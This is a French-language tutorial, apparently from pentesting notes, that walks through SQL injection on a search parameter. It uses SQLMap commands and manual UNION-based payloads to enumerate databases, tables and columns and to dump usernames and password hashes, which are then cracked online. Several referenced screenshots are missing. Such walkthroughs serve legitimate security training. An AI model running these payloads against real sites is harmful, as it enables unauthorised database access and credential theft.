Injection SQL (SQLMap et manuel)

Une injection SQL est une vulnérabilité de sécurité dans les applications web qui survient lorsque des requêtes SQL malveillantes sont insérées dans des champs d'entrée pour manipuler une base de données sous-jacente. Cela permet à un attaquant d'accéder, de modifier ou de filtrer des données non autorisées. Des outils tels que SQLMap automatisent ce processus en identifiant et exploitant de telles vulnérabilités, effectuant des injections SQL de manière automatisée. Alternativement, les attaquants peuvent également effectuer des attaques d'injection SQL manuellement en manipulant directement les entrées pour obtenir un accès non autorisé à la base de données.

Injection SQL de manière automatisée (SQLMap)

Interceptons une demande de recherche avec Burpsuite :

Sauvegardons cette demande dans un fichier que nous appellerons request.req :

Le fichier contient le contenu suivant :

Avec l'outil SQLMap, lançons la commande suivante pour voir si ce site web est vulnérable à une attaque SQL :

sqlmap -r request.req  -p searchitem --batch

Avec cette commande, listons toutes les bases de données :

sqlmap -r request.req  -p searchitem --batch --dbs

Avec cette commande, listons toutes les tables d'une base de données spécifique :

sqlmap -r request.req  -p searchitem --batch -D "nom de la base de données" --tables

Avec cette commande, listons toutes les colonnes d'une table spécifique :

sqlmap -r request.req  -p searchitem --batch -T "nom de la table" --columns

Avec cette commande, visualisons le contenu des colonnes :

sqlmap -r request.req  -p searchitem --batch -T users -C username,password --dump

Si l'outil trouve des mots de passe chiffrés, il les déchiffre automatiquement :

Injection SQL de manière manuelle

Interceptons une demande de recherche avec Burpsuite :

Envoyons cette demande au Repeater :
Dans le champ de recherche searchitem, ajouter ceci :

test' order by 100-- -

Le serveur web nous indique qu'il n'y a pas autant de colonnes :

Essayons jusqu'à ce qu'il n'y ait plus rien (dans ce cas, il y a 5 colonnes) :

Nous savons maintenant qu'il y a 5 colonnes, maintenant avec la fonction union, nous allons les visualiser :

test' union select 1,2,3,4,5-- -

En cas de changement du nom de la 3e colonne, par exemple "test", il changera également :

Cela signifie que si nous introduisons la fonction database() ou user(), le nom de la base de données ou le nom d'utilisateur qui exécute la base de données sera affiché :

CI-DESSOUS EST LA PROCÉDURE POUR LISTE MANUELLE :

Listons toutes les bases de données :

test' union select 1,2,schema_name,4,5 from information_schema.schemata-- -

Listons toutes les tables d'une base de données spécifique :

test' union select 1,2,table_name,4,5 from information_schema.tables where table_schema='nom de la base de données'-- -

Listons toutes les colonnes d'une table spécifique :

test' union select 1,2,column_name,4,5 from information_schema.columns where table_schema='nom de la base de données' and table_name='nom de la table'-- -

Visualisons le contenu des colonnes username et password (dans ce cas, nous utilisons les colonnes "product name" et "product type") :

test' union select 1,username,password,4,5 from users-- -

Listons à nouveau le contenu des colonnes username et password :

test' union select 1,2,group_concat(username,0x3a,password),4,5 from users-- -

Copions le contenu dans la section Pretty de Burpsuite :

Ouvrons l'éditeur de texte Nvim et collons le texte copié, puis utilisons cette commande pour le formater correctement : :%s/,/\r/g
Avec cette commande, ne conservons que les hachages et copions-les dans le ClipBoart : cat data | awk '{print $2}' FS=":" | xclip -sel clip

Enfin, avec le site web hashes, obtenons les mots de passe en texte brut :

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?